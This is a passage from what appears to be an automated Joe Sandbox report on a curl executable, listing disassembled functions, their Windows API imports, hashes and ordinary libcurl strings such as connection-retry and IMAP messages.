                                • Instruction Fuzzy Hash: 4F115B75904329EFCB259F6894806A9FBF5FF5A344F14C065E899DB309D672C9088F50
                                APIs
                                • GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,00888727,?,?,00000000,?,?,?,00888849,00000000,?), ref: 00872698
                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00887EE5,?,?,?,00888727,?,?,00000000,?,?,?,00888849,00000000,?,?), ref: 008726C4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00888849,00000000,?,?,?,00872373,?,?,?,?,008616C6,?,00200030), ref: 008726DF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: EnvironmentVariablefreerealloc
                                • String ID: CURL_SSL_BACKEND
                                • API String ID: 3604909764-3552431867
                                • Opcode ID: e44170282852c13378ca0e515fe3eced97b24d7c43f11755de6a9a427c72727d
                                • Instruction ID: 11dee9146adb189e8edcaabaec2a1cafa7302f2b43604c14217ea0d0dc651753
                                • Opcode Fuzzy Hash: e44170282852c13378ca0e515fe3eced97b24d7c43f11755de6a9a427c72727d
                                • Instruction Fuzzy Hash: 37014736E08528AB5F214B699C0495F7FFEFBD5B64725802BE905E3310DAB18C008BA4
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086D58E
                                • strtod.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?), ref: 0086D59C
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086D5A7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$strtod
                                • String ID: 0Lu@Ru@/Mu
                                • API String ID: 3632641845-1923536700
                                • Opcode ID: d2d0883ead099eaec1b7ffe0ddbf7deb0213859851009b2e5e4801d9bca33f48
                                • Instruction ID: 8c1fe81221cd63dbe461732069b15e60725757037ace96d0c72eacb2459d61e3
                                • Opcode Fuzzy Hash: d2d0883ead099eaec1b7ffe0ddbf7deb0213859851009b2e5e4801d9bca33f48
                                • Instruction Fuzzy Hash: 6B012632E00B09DAC7129E34D8096BDB778FF42788F268396D403FE841D7708981C6A0
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086D511
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?), ref: 0086D522
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0086D52D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$strtol
                                • String ID: 0Lu@Ru@/Mu
                                • API String ID: 3596500743-1923536700
                                • Opcode ID: 60f0f733a04c6503669c54fcfd26c74cc866d02af2d64f297af569c7a037ea12
                                • Instruction ID: 8e24e4a93f78cc3f1f6f258ea5be0c46627be590980410edab2736118246fe61
                                • Opcode Fuzzy Hash: 60f0f733a04c6503669c54fcfd26c74cc866d02af2d64f297af569c7a037ea12
                                • Instruction Fuzzy Hash: CB01F232A00B08EFDB128F58D808BAC77B8FB86359F2641A6D002CB501D3B18E00CBA0
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 008AAE0A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AAE21
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008AAE3D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strdup
                                • String ID: %s/%s
                                • API String ID: 2653869212-2758257063
                                • Opcode ID: c5a275738bc2bb21fd5f86395393268835aa5f82ed68f7f8ad634ede690f3883
                                • Instruction ID: b3c59ef12359fd0b252c52228ca43ccd09f922c48ab13bbf93c4a95453d7aca7
                                • Opcode Fuzzy Hash: c5a275738bc2bb21fd5f86395393268835aa5f82ed68f7f8ad634ede690f3883
                                • Instruction Fuzzy Hash: 4BF02733A049305B52152728BC0896F6BA8FEC6F71319412AF800D3351EFA50C0082E1
                                APIs
                                • send.WS2_32(?,000000FF,00000003,00000000), ref: 0089E8AE
                                • WSAGetLastError.WS2_32(?,?,?,0089E787,00000000), ref: 0089E8B8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLastsend
                                • String ID: SENT$Sending data failed (%d)
                                • API String ID: 1802528911-3459338696
                                • Opcode ID: 7a2d61a77f0950e856224f4256f3a9e40966fca9f04baabd6518ec08e4837204
                                • Instruction ID: 9a4b24be0f56cfec729c304ddbd05ccea558ab7316cd7a310f00afd855fb7c03
                                • Opcode Fuzzy Hash: 7a2d61a77f0950e856224f4256f3a9e40966fca9f04baabd6518ec08e4837204
                                • Instruction Fuzzy Hash: 3FF0F031204704BFDB06B798EC0AEAF3FA8FB45360F0881A8F945D72C1E5619E0083A1
                                APIs
                                • _read.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 00861F24
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00861F32
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00861F3D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$_read
                                • String ID: 0Lu@Ru@/Mu
                                • API String ID: 530745434-1923536700
                                • Opcode ID: 68dc45af9e80a1ba6fa8ba57975b585781317ddaece03b5e7484369792eaadd4
                                • Instruction ID: a15b5ce06cf9b00b8a45d30007d0dd9ae3e17b2bc5d5dbecbc2e7cb163570eec
                                • Opcode Fuzzy Hash: 68dc45af9e80a1ba6fa8ba57975b585781317ddaece03b5e7484369792eaadd4
                                • Instruction Fuzzy Hash: 23F054312046059FDF058F58E805BAA37E4FF19351F494468F849CB312CB72EC108755
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882EDF
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882F0B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00882F22
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: calloc$free
                                • String ID:
                                • API String ID: 171065143-0
                                • Opcode ID: 9ed9a715803804c3cd8e787c1f03336eb07ba2ef084da85614c9ae642ce7ca80
                                • Instruction ID: 395e45c60cebab3fdaa2820d7c04a0dd4e199c2acd36c76e2b83144470e7de8f
                                • Opcode Fuzzy Hash: 9ed9a715803804c3cd8e787c1f03336eb07ba2ef084da85614c9ae642ce7ca80
                                • Instruction Fuzzy Hash: 1FB16B79508A818EDB12DF6888887D67BA1FF19714F1C80BADD49CF347D7729906CBA0
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000017,00000017,?,0088EB2F,?,?,?,?,?), ref: 008A016B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0087E01D,00000000,00000000,?), ref: 008A01A4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0087E01D), ref: 008A01CA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0087E01D), ref: 008A0222
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0087E01D,00000000,00000000,?), ref: 008A0234
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$malloc
                                • String ID:
                                • API String ID: 2190258309-0
                                • Opcode ID: 44e5759be4b15ebaf1b720c11060ac7d614705a0cf67bef773de39805a822c9c
                                • Instruction ID: 939cc976e19fd313e62fcbc7c99f12344be1a18658b433a967f662efed9c791c
                                • Opcode Fuzzy Hash: 44e5759be4b15ebaf1b720c11060ac7d614705a0cf67bef773de39805a822c9c
                                • Instruction Fuzzy Hash: D731D576604618DFEB059F18EC44A6D7BF5FF4A720B24806AE905DB351DBB19D00CF90
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008811DA
                                  • Part of subcall function 00870D8D: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00870DA4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008811F3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881208
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881231
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881246
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$malloc
                                • String ID:
                                • API String ID: 2190258309-0
                                • Opcode ID: f622d0504c200bd6eda8182b5bb15ff4a9df757c84e94d9b689f2b9200d06e8e
                                • Instruction ID: bbed6f1e94282b5eba84ea6007d00bf393b57dfc56b6235c3dd08408b428180c
                                • Opcode Fuzzy Hash: f622d0504c200bd6eda8182b5bb15ff4a9df757c84e94d9b689f2b9200d06e8e
                                • Instruction Fuzzy Hash: 7D3182367006158BDF21EF58DC4862977EAFF84760F18417ADA05D7351CF74AC028B91
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AABCC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AABFD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AAC1F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AAC36
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AAC50
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: a838f9f4a993c93b0999834b6b237aa4badf39607679f652cba96316984ab02d
                                • Instruction ID: 6e83393de0c30feb0180fd1b799b63be7cfd2f9086e0655ddb16f2311d4896d8
                                • Opcode Fuzzy Hash: a838f9f4a993c93b0999834b6b237aa4badf39607679f652cba96316984ab02d
                                • Instruction Fuzzy Hash: 9F21C976A04A26EFDB059F65ED94418FFB2FF48761314912AE90593B61CB75AC20CFC0
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089DD98
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
                                • API String ID: 1294909896-4272885751
                                • Opcode ID: c6029bfbc8d8233e0b33ccb44929c7e54acf70e677f73a28834f7cbeebf29a4a
                                • Instruction ID: 12575b7dc829dbb8e9042196df403d7ab4285f9d94454f0f3b48a8261bb15aa9
                                • Opcode Fuzzy Hash: c6029bfbc8d8233e0b33ccb44929c7e54acf70e677f73a28834f7cbeebf29a4a
                                • Instruction Fuzzy Hash: 8D619271B00706EFCB18EF68C8816A9F7A2FF94304F18416AD91ADB351DB31B850DB95
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089741B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089759B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008975B6
                                Strings
                                • Failed to alloc scratch buffer, xrefs: 00897427
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$malloc
                                • String ID: Failed to alloc scratch buffer
                                • API String ID: 2190258309-2192203314
                                • Opcode ID: a7170234929f7f7bb53c3dc0005e62176ffc40d95ea04b9e0723e8e1f6b8fe33
                                • Instruction ID: fd62f2d9bbd115bcb4d5cad77d4737f5e41f421722b96b1d1a9f97765e4296e5
                                • Opcode Fuzzy Hash: a7170234929f7f7bb53c3dc0005e62176ffc40d95ea04b9e0723e8e1f6b8fe33
                                • Instruction Fuzzy Hash: 18616075E1460A9FCF04DFA8D984AAEBBF5FF48314F1881AAD505E7342D730AA01CB94
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00896E3D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00896F1D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: .
                                • API String ID: 1294909896-916926321
                                • Opcode ID: 70bf0316d6c2a55ae0ddc8ef67f9cf995eb24ceaf1f95bec4f6448851fc75754
                                • Instruction ID: 490767ceb80970655bd28975822644b0b7117663b6e70c014bc91939a166f759
                                • Opcode Fuzzy Hash: 70bf0316d6c2a55ae0ddc8ef67f9cf995eb24ceaf1f95bec4f6448851fc75754
                                • Instruction Fuzzy Hash: 15518D71A08715DFDF10DF24E844B6ABBE4FF49750F18856AF849DB241EB70A814CB92
                                APIs
                                • getaddrinfo.WS2_32(?,?,?,?), ref: 0089FEC0
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 0089FF44
                                • freeaddrinfo.WS2_32(00000000,?,?), ref: 0089FFCE
                                • WSASetLastError.WS2_32(00002AF9,?,?), ref: 0089FFF2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLastfreeaddrinfogetaddrinfomalloc
                                • String ID:
                                • API String ID: 2354400463-0
                                • Opcode ID: de5506be14eebe18a994b406bd49e22629d4986b58f085a722919db653b9af76
                                • Instruction ID: 6594bed3287eb0b04f811afd544182e4d0573146b5899f9e49dc172c8fa528b8
                                • Opcode Fuzzy Hash: de5506be14eebe18a994b406bd49e22629d4986b58f085a722919db653b9af76
                                • Instruction Fuzzy Hash: 06419C72A00A06AFCF28EF68D440AAAB7B5FF45315F18453DE616D7642DB70E944CBD0
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088C7FA
                                Strings
                                • Connection died, retrying a fresh connect (retry count: %d), xrefs: 0088C777
                                • REFUSED_STREAM, retrying a fresh connect, xrefs: 0088C72F
                                • Connection died, tried %d times before giving up, xrefs: 0088C759
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Connection died, retrying a fresh connect (retry count: %d)$Connection died, tried %d times before giving up$REFUSED_STREAM, retrying a fresh connect
                                • API String ID: 1294909896-4242497519
                                • Opcode ID: 43681ddb17836bad6df6cc020466c7c067e2396fd60fbaa409519cf70594f95b
                                • Instruction ID: f998c183471926f4d110393d744ef2ae60b5d26dc6bfed3a784fb46dd05a2cff
                                • Opcode Fuzzy Hash: 43681ddb17836bad6df6cc020466c7c067e2396fd60fbaa409519cf70594f95b
                                • Instruction Fuzzy Hash: C041F830748645AFEB19EB38D848B65BBA0FF45314F184179D40DCB386D771A840CBB1
                                APIs
                                  • Part of subcall function 00863857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00863872
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A1B96
                                Strings
                                • OK [UIDVALIDITY %19[0123456789]], xrefs: 008A1B68
                                • Select failed, xrefs: 008A1C32
                                • Mailbox UIDVALIDITY has changed, xrefs: 008A1BDE
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __stdio_common_vsscanffree
                                • String ID: Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY %19[0123456789]]$Select failed
                                • API String ID: 2458389622-3309259123
                                • Opcode ID: a6befb74ff8453f10d91fd089e4adc7b4b891bc08a2b2ee147e833d350fa1f4c
                                • Instruction ID: 301fe87cb3ab49022dcf5212637bf720725579e0d20fd59f70ece24e1d6bff2c
                                • Opcode Fuzzy Hash: a6befb74ff8453f10d91fd089e4adc7b4b891bc08a2b2ee147e833d350fa1f4c
                                • Instruction Fuzzy Hash: 0C31F970B042058BEF04AF59D88A9AD77B9FF89720F14407AE906E7742EB74AC018B55
                                APIs
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,Failed to create/open output), ref: 0086909C
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 008690D7
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(008B7668,?), ref: 008690E8
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 00869107
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fputs$fwrite
                                • String ID:
                                • API String ID: 2206100360-0
                                • Opcode ID: 77b9fd65ed49e0dd7d1601a228ebd2ccdae81f6b4c9b327b647c3ca719965407
                                • Instruction ID: 3b0ab8d14529be32685023a1b627af8fd2ab3310382cbc73507a9e0c41d0b940
                                • Opcode Fuzzy Hash: 77b9fd65ed49e0dd7d1601a228ebd2ccdae81f6b4c9b327b647c3ca719965407
                                • Instruction Fuzzy Hash: E931F936504606EFCB11CFA8D844AA8FBF9FF45310B254255E895D3395DB72AD05CB90
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 00890489
                                • ___from_strstr_to_strchr.LIBCMT ref: 00890499
                                • ___from_strstr_to_strchr.LIBCMT ref: 008904A8
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,0088A507), ref: 008904DD
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr$malloc
                                • String ID:
                                • API String ID: 383369926-0
                                • Opcode ID: a5f9ce4dcef70462e2bdcc7efbd398306baa0bb83489ea8da4e97b1b8594d65a
                                • Instruction ID: 09e95b0629618aa5e73efc36206b5c4f857b698fc7e7908339cba015cf5bdf57
                                • Opcode Fuzzy Hash: a5f9ce4dcef70462e2bdcc7efbd398306baa0bb83489ea8da4e97b1b8594d65a
                                • Instruction Fuzzy Hash: 78117B661082231DDF113A786C906BB1789FFC27ECF2C101DE682DF383ED128C054AA9
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00887864
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008878B8
                                Strings
                                • -----END PUBLIC KEY-----, xrefs: 00887839
                                • -----BEGIN PUBLIC KEY-----, xrefs: 00887811
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
